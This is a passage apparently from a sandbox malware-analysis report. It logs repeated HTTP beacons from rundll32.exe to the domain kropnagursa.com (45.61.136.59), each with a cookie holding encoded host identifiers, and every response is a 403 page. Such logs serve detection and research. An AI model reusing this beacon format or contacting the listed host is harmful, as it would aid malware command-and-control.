                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:53.727941990 CET2484INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:53 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            296192.168.2.44999245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:54.402822971 CET2485OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:54.567658901 CET2486INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:54 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            297192.168.2.44999345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:54.880831003 CET2487OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:55.045931101 CET2487INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:54 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            298192.168.2.44999445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:55.743599892 CET2488OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:55.908194065 CET2488INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:55 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            299192.168.2.44999545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:56.227917910 CET2489OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:56.392734051 CET2490INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:56 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            3192.168.2.44969945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:16:58.928596973 CET2112OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:16:59.102349043 CET2112INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:16:59 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            30192.168.2.44972645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:17.528629065 CET2145OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:17.693311930 CET2146INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:17 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            300192.168.2.44999645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:56.913079977 CET2490OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:57.078567982 CET2491INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:56 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            301192.168.2.44999745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:57.385440111 CET2492OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:57.550249100 CET2492INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:57 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            302192.168.2.44999845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:58.243803978 CET2493OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:58.417655945 CET2493INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:58 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            303192.168.2.44999945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:59.095657110 CET2494OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:59.262938976 CET2495INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:59 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            304192.168.2.45000045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:59.899364948 CET2495OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:20:00.064121008 CET2496INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:59 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            305192.168.2.45000145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:20:00.378770113 CET2497OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:20:00.546883106 CET2497INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:20:00 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            306192.168.2.45000245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:20:01.474476099 CET2498OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:20:01.639381886 CET2498INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:20:01 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            307192.168.2.45000345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:20:01.943878889 CET2499OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:20:02.110050917 CET2500INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:20:02 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            308192.168.2.45000445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:20:02.425790071 CET2500OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:20:02.591098070 CET2501INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:20:02 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
